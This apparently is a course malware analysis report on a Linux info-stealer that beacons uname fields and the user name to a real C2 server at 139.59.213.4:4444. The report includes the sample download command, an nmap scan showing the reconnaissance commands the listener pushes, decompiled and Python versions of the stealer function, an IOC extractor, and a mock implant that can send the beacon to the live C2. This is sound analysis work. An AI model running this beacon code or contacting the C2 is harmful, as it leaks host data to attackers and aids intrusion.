![Malware Analysis Report](https://hackmd.io/_uploads/BJyhyikMkx.svg)

[toc]

# What ?

This is a malware analysis report for the [exercise](https://docs.google.com/document/d/1SB9yzvTTLzN-Re-sgegL2xsgimOM9g2SvDauj_K-WJo/edit?tab=t.0#heading=h.yijxjuljd1pa) from Class 7, LATERAL MOVEMENT, VIRTUALIZATION, AND THREAT INTELLIGENCE, as described in the following video: [Class 7 - Dr. S. García: Introduction to Computer Security (B4M36BSY)](https://youtu.be/mguCzX7Ynv0?si=8ahnR9oyViQeOkY7&t=7315)

## Abbreviations used in this note

Abb | Expansion
:---: | :---:
MW | Malware
MWA | Malware Analysis

# HUH ?

The MW used during the exercise was downloaded and a simple analysis was performed on it.

## Setup

1. Download the MW

```sh
wget --no-check-certificate "https://docs.google.com/uc?export=download&id=1gZo-841lZ83Lb8qYKGpoMZH1VhSL92EB" -O suspiciousfile
```

:::danger
Pushing the MW to GitHub will get your account flagged or disabled.
:::

2. Run the analysis inside a Docker container, with networking disabled (`--network none`) and the sample mounted read-only, so that an accidental execution can neither reach the C2 server nor modify the host.

# Findings

## Infection Flow Diagram

```mermaid
sequenceDiagram
    participant Victim
    participant Server
    Victim->>Server: Gathered system info (uname fields + user name)
    loop until the binary is terminated
        Server->>Victim: Stream of text (command strings)
        Victim->>Server: Response
    end
```

## Summary

Description | Details
:---: | :---:
Type | Linux ELF binary, compiled from C
Encryption / packing | None
Activity | Info stealer

## Static Analysis

> A variety of open source tools were used for these findings

### Encryption

None.

![1](https://hackmd.io/_uploads/SJfMI8yz1g.jpg)

- Compiled C program
- No encryption or packing: the strings discussed below are readable directly in the binary

### IP found in binary

- `139.59.213.4`

```
# Nmap 7.80 scan initiated Fri Nov 8 17:10:57 2024 as: nmap -script default -oN n.txt 139.59.213.4
Nmap scan report for 139.59.213.4
Host is up (0.14s latency).
Not shown: 995 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
25/tcp   filtered smtp
465/tcp  filtered smtps
587/tcp  filtered submission
4444/tcp open     krb524
# Nmap done at Fri Nov 8 17:11:10 2024 -- 1 IP address (1 host up) scanned in 13.83 seconds
```

A more detailed nmap vulnerability scan is available at https://pastebin.com/raw/ZLLVtVAD; the following discussion is based on sections extracted from it.

The detailed scan identifies the SSH service version:

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
```

- A version banner alone does not establish that the server is vulnerable: the Ubuntu package revision (`3ubuntu13.5`) carries distribution backports, so any CVE that nmap's version scripts match against `9.6p1` has to be checked against Ubuntu's security notices for that revision before calling the service vulnerable.
- Several attempts to connect to this port were unsuccessful.

```
4444/tcp open  krb524?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, LDAPSearchReq, NCP, SSLSessionReq, SSLv23SessionReq, WMSRequest:
|     netstat -anp
|   GenericLines, NotesRPC:
|     whoami
|   GetRequest, NULL, SMBProgNeg, TerminalServerCookie:
|     hostname
|   HTTPOptions, Kerberos, LANDesk-RC, RPCCheck, SIPOptions, TLSSessionReq, ms-sql-s, oracle-tns:
|     uptime
|   Help, JavaRMI, LDAPBindReq:
|     cat /proc/meminfo
|   TerminalServer, X11Probe:
|     uname -a
|   afp, giop:
|_    ifconfig
```

- First line: `krb524` is only the name nmap's port table assigns to 4444/tcp, and the trailing `?` means the service could not be identified; nothing here indicates a Kerberos server. Port 4444 is a common default for reverse-shell and C2 listeners. It is possible to telnet to this port, but the responses are delayed and arrive as a stream of seemingly random text.
- Remaining lines (`fingerprint-strings`): whatever probe nmap sent, the listener answered with a shell command (`netstat -anp`, `whoami`, `hostname`, `uptime`, `cat /proc/meminfo`, `uname -a`, `ifconfig`). These are the strings that get printed to the console when connected; typing the same commands back into the connection does not seem to do anything. This is consistent with a listener that pushes commands to a connecting implant and expects the implant, not the operator, to execute them.

:::warning
Because the listener emits this text regardless of what is sent to it, the IP may be a honeypot.
A connection is possible, but no further action could be performed through it.
:::

### Functions

![2](https://hackmd.io/_uploads/rJeUPIkzkx.jpg)

**Important Functions**

Function | Description
:--: | :--:
`_start` | ELF entry point (C runtime start-up); it calls `main`
`main` | Main function, called on entry
`gather_system_info` | Info-stealing function: collects the `uname` fields and the current user name
`execute_and_send_command` | Sends the collected information to the server at `139.59.213.4`, which replies with a stream of text; judging by its name and by the command strings observed on port 4444, it executes what the server sends and returns the output

:::info
`gather_system_info` is the information stealing function
:::

```c
// Pseudo code generated from Ghidra for gather_system_info()
// param_1/param_2: output buffer and its size, filled with the beacon string
void gather_system_info(char *param_1, size_t param_2)
{
  __uid_t __uid;
  passwd *ppVar1;
  char *param8;
  long in_FS_OFFSET;
  utsname local_198;
  long local_10;

  local_10 = *(long *)(in_FS_OFFSET + 0x28);   // stack canary
  uname(&local_198);                           // kernel and host identification
  __uid = getuid();
  ppVar1 = getpwuid(__uid);                    // resolve the uid to a user name
  if (ppVar1 == (passwd *)0x0) {
    param8 = "unknown";
  }
  else {
    param8 = ppVar1->pw_name;
  }
  // Beacon format: pipe-separated key:value fields
  snprintf(param_1, param_2, "OS:%s|Node:%s|Release:%s|Version:%s|Machine:%s|User:%s",
           local_198.sysname, local_198.nodename, local_198.release, local_198.version,
           local_198.machine, param8);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}
```

- The `snprintf` format string shows the information gathered from the system and sent to the server:

Variable | Information
:---: | :---:
`sysname` | Operating system name
`nodename` | Network node hostname
`release` | OS release
`version` | OS version level
`machine` | Machine hardware identifier
`pw_name` | User name of the account the binary runs as (`"unknown"` if the uid cannot be resolved)

#### Python Representation

For testing, the equivalent in Python is:

```python
import os
import platform
import pwd  # POSIX only, like the getpwuid() call in the binary


def gather_system_info():
    # Gather system information using the platform module
    sysname = platform.system()    # Equivalent to `uname.sysname`
    nodename = platform.node()     # Equivalent to `uname.nodename`
    release = platform.release()   # Equivalent to `uname.release`
    version = platform.version()   # Equivalent to `uname.version`
    machine = platform.machine()   # Equivalent to `uname.machine`

    # Get the current user ID and username
    user_id = os.getuid()          # Equivalent to `getuid()`
    try:
        username = pwd.getpwuid(user_id).pw_name
    except KeyError:
        username = "unknown"       # Same fallback as the binary when getpwuid() returns NULL

    # Format the system information string exactly as the binary's snprintf() does
    system_info = f"OS:{sysname}|Node:{nodename}|Release:{release}|Version:{version}|Machine:{machine}|User:{username}"
    return system_info


# Example usage
info = gather_system_info()
print(info)
```
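The `strings`-style step that surfaced `139.59.213.4` and the beacon format string in the static analysis can be scripted so that it also rejects the dotted-number false positives a naive grep for IPv4 literals produces. The following is an added example written for this note, not code from the analysed sample or the course material; the byte blob it scans is constructed here to stand in for the binary's `.rodata` and contains only the two strings the report identified plus decoys. `scan_file()` runs the same extraction over a real file.

```python
import re
import sys

# Added example, not code from the analysed sample. SAMPLE_BLOB is a constructed
# stand-in for the binary's .rodata: it embeds the two strings the report found
# (the C2 address and the snprintf format string) plus decoys that a naive
# grep for dotted numbers would report.
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"139.59.213.4\x00"
    + b"OS:%s|Node:%s|Release:%s|Version:%s|Machine:%s|User:%s\x00"
    + b"\xde\xad\xbe\xef"
    + b"256.300.1.1\x00"      # decoy: four dotted numbers but not a valid address
    + b"010.0.0.1\x00"        # decoy: leading zero, rejected to avoid octal ambiguity
    + b"GLIBC_2.34\x00"       # decoy: dotted but not four groups
    + b"/proc/meminfo\x00"
)

BEACON_FORMAT = b"OS:%s|Node:%s|Release:%s|Version:%s|Machine:%s|User:%s"
_IPV4_CANDIDATE = re.compile(rb"(?<![0-9.])(?:[0-9]{1,3}\.){3}[0-9]{1,3}(?![0-9.])")


def valid_ipv4(text):
    """Octet-by-octet validation of a dotted-quad candidate (bytes)."""
    octets = text.split(b".")
    if len(octets) != 4:
        return False
    for o in octets:
        if not o.isdigit() or int(o) > 255 or (len(o) > 1 and o.startswith(b"0")):
            return False
    return True


def find_ipv4_literals(blob):
    """Validated IPv4 literals embedded in the blob, de-duplicated and sorted."""
    return sorted({m.group(0).decode() for m in _IPV4_CANDIDATE.finditer(blob)
                   if valid_ipv4(m.group(0))})


def find_strings(blob, min_len=4):
    """Printable ASCII runs, like `strings -n <min_len>`."""
    return [m.group(0).decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def extract_iocs(blob):
    """Pull out what the report keys on: network literals, the beacon format
    string, and paths or pipe-delimited strings worth a second look."""
    return {
        "ipv4": find_ipv4_literals(blob),
        "beacon_format_present": BEACON_FORMAT in blob,
        "interesting_strings": [s for s in find_strings(blob)
                                if s.startswith("/proc") or "|" in s],
    }


def scan_file(path):
    """Run the extraction over a file on disk (e.g. the downloaded sample)."""
    with open(path, "rb") as f:
        return extract_iocs(f.read())


if __name__ == "__main__":
    result = scan_file(sys.argv[1]) if len(sys.argv) > 1 else extract_iocs(SAMPLE_BLOB)
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it as `python3 iocs.py suspiciousfile` inside the analysis container; with no argument it scans the constructed blob. The octet validation is what separates the real C2 address from version strings and other dotted numbers that a plain regex reports.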
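To study what the listener on `139.59.213.4:4444` pushes without ever executing its commands, the implant side of the exchange in the flow diagram can be emulated: connect, send a beacon in the `OS:...|User:...` format, log every command line the server sends, and answer with canned text. The code below is an added example, not the sample's own code. Newline-delimited framing and a one-reply-per-command turn structure are assumptions (the nmap fingerprint only shows the command strings), and the mock C2 server included here exists so the exchange can be exercised offline on 127.0.0.1 with commands copied from the fingerprint.

```python
import socket
import threading

# Added example, not the sample's own code. Framing is an ASSUMPTION: the report
# only shows that the listener on 139.59.213.4:4444 emits lines such as
# `whoami`; here both sides speak newline-delimited text, one reply per command.

# Commands copied from the nmap fingerprint-strings of the real listener.
C2_COMMANDS = ["whoami", "hostname", "uname -a", "cat /proc/meminfo"]

# Constructed canned answers. Nothing the server sends is ever executed.
CANNED = {
    "whoami": "analyst\n",
    "hostname": "sandbox\n",
    "uname -a": "Linux sandbox 6.1.0 #1 SMP x86_64 GNU/Linux\n",
}
UNKNOWN_REPLY = "sh: command not found\n"


def parse_beacon(line):
    """Server-side view of the beacon: split 'OS:..|Node:..|...' into a dict.
    Only the first ':' of each field separates key from value, so a uname
    version string containing ':' survives; a '|' inside a value would not,
    which is an ambiguity of the binary's own format."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition(":")
        fields[key] = value
    return fields


def start_mock_c2(commands):
    """Local stand-in for the listener, bound to an ephemeral loopback port:
    reads one beacon line, then pushes each command and reads one reply line.
    Returns (port, log, thread); log fills in as the exchange proceeds."""
    srv = socket.create_server(("127.0.0.1", 0))
    port = srv.getsockname()[1]
    log = {"beacon": None, "replies": []}

    def run():
        conn, _ = srv.accept()
        with conn, conn.makefile("rb") as rf:
            log["beacon"] = parse_beacon(rf.readline().decode(errors="replace"))
            for cmd in commands:
                conn.sendall(cmd.encode() + b"\n")
                log["replies"].append(rf.readline().decode(errors="replace").rstrip("\n"))
        srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return port, log, t


def fake_implant(host, port, beacon, canned=CANNED, max_cmds=32, timeout=5.0):
    """Emulate the implant: send the beacon, then log every command the server
    pushes and answer from the canned table. Returns the commands received."""
    received = []
    with socket.create_connection((host, port), timeout=timeout) as s, s.makefile("rb") as rf:
        s.sendall(beacon.encode() + b"\n")
        for _ in range(max_cmds):          # bound the loop; the real binary never stops
            line = rf.readline()
            if not line:                   # server closed the connection
                break
            cmd = line.decode(errors="replace").strip()
            received.append(cmd)
            s.sendall(canned.get(cmd, UNKNOWN_REPLY).encode())
    return received


def run_demo(beacon="OS:Linux|Node:sandbox|Release:6.1.0|Version:#1 SMP|Machine:x86_64|User:analyst"):
    """Run the whole exchange against the mock listener on loopback."""
    port, log, t = start_mock_c2(C2_COMMANDS)
    received = fake_implant("127.0.0.1", port, beacon)
    t.join(timeout=5)
    return received, log


if __name__ == "__main__":
    received, log = run_demo()
    print("server parsed beacon:", log["beacon"])
    print("commands pushed by server:", received)
    print("replies the server recorded:", log["replies"])
```

Against the real listener, `fake_implant("139.59.213.4", 4444, gather_system_info())` would be run only from an isolated analysis host, and only if contacting the C2 is acceptable for the engagement; the `max_cmds` bound and the socket timeout keep the client from hanging on a listener that streams indefinitely, and the canned table guarantees that nothing the server sends is executed.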